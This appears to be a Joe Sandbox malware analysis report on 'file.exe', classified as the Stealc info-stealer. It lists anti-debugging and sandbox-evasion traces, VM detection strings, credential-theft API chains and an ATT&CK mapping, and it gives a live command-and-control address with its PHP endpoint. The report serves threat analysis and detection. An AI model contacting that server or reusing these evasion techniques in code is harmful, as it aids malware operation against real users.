                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C89AB second address: 10C89DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F6C14B92236h 0x0000000a popad 0x0000000b pushad 0x0000000c js 00007F6C14B92236h 0x00000012 jmp 00007F6C14B92247h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C89DB second address: 10C89DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8B30 second address: 10C8B35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8E32 second address: 10C8E3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jc 00007F6C1537B646h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8FC0 second address: 10C8FC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8FC4 second address: 10C8FCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8FCA second address: 10C8FDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6C14B92241h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8FDF second address: 10C8FE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8FE3 second address: 10C8FF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F6C14B92236h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8FF5 second address: 10C901C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F6C1537B653h 0x0000000b jbe 00007F6C1537B646h 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C901C second address: 10C9031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F6C14B92238h 0x0000000b pushad 0x0000000c popad 0x0000000d jo 00007F6C14B9223Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C92F7 second address: 10C9312 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C1537B657h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CADA0 second address: 10CADB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jnp 00007F6C14B92236h 0x0000000c popad 0x0000000d jbe 00007F6C14B92254h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CADB7 second address: 10CADBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CADBB second address: 10CADCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F6C14B92236h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CD993 second address: 10CD9D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C1537B64Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push ebx 0x0000000e pushad 0x0000000f jno 00007F6C1537B646h 0x00000015 jmp 00007F6C1537B64Bh 0x0000001a popad 0x0000001b pop ebx 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007F6C1537B655h 0x00000026 push ecx 0x00000027 pop ecx 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CDC0D second address: 10CDC11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CF02A second address: 10CF030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CF030 second address: 10CF036 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40284 second address: 4D402B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6C1537B658h 0x0000000b popad 0x0000000c mov dword ptr [esp], ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov edx, 6F2C23C0h 0x00000017 push edi 0x00000018 pop esi 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D402B1 second address: 4D402B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D402B7 second address: 4D402BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D402F9 second address: 4D402FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D402FD second address: 4D4031A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C1537B659h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D4031A second address: 4D40320 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40320 second address: 4D40324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40324 second address: 4D40328 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40328 second address: 4D40357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movsx edi, si 0x0000000f pushfd 0x00000010 jmp 00007F6C1537B64Ch 0x00000015 and ecx, 68CFF128h 0x0000001b jmp 00007F6C1537B64Bh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40357 second address: 4D40391 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C14B92249h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6C14B92248h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40391 second address: 4D40397 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF361E second address: FF3628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F6C14B92236h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF384B second address: FF3851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E51DFD instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: FE77C3 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 106FCEA instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C038B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00C038B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C04910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C04910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00BFDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00BFE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00BFED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C04570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00C04570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BFF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFF68A FindFirstFileA,0_2_00BFF68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C03EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00C03EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BF16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BFDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00BFBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF1160 GetSystemInfo,ExitProcess,0_2_00BF1160
                Source: file.exe, file.exe, 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2112766908.00000000006CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2112766908.0000000000741000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2112766908.0000000000712000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.2112766908.00000000006CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware(
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13763
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13766
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13778
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13785
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13818
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF45C0 VirtualProtect ?,00000004,00000100,000000000_2_00BF45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C09860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C09860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C09750 mov eax, dword ptr fs:[00000030h]0_2_00C09750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C078E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00C078E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5464, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C09600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00C09600
                Source: file.exeBinary or memory string: oProgram Manager
                Source: file.exe, 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: oProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00C07B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C07980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00C07980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C07850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00C07850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C07A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00C07A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.bf0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2112766908.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2072045799.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5464, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.bf0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2112766908.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2072045799.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5464, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/ws100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.phpBfile.exe, 00000000.00000002.2112766908.000000000072F000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37file.exe, 00000000.00000002.2112766908.00000000006CE000.00000004.00000020.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.php6file.exe, 00000000.00000002.2112766908.000000000072F000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/Ifile.exe, 00000000.00000002.2112766908.000000000072F000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/wsfile.exe, 00000000.00000002.2112766908.000000000072F000.00000004.00000020.00020000.00000000.sdmptrue
                      • URL Reputation: malware
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.phpiHfile.exe, 00000000.00000002.2112766908.0000000000741000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        185.215.113.37
                        		unknownPortugal
                        		206894WHOLESALECONNECTIONSNLtrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1541926
                        Start date and time:2024-10-25 10:26:06 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 3m 16s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:2
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@1/0@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 80%
                        • Number of executed functions: 19
                        • Number of non-executed functions: 91
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: file.exe

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php

                        Domains

                        No context

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        No created / dropped files found

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.94644211804884
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:file.exe
                        File size:1'795'584 bytes
                        MD5:c1dcd48eb2e8b81dfac6e6c4b33a4cee
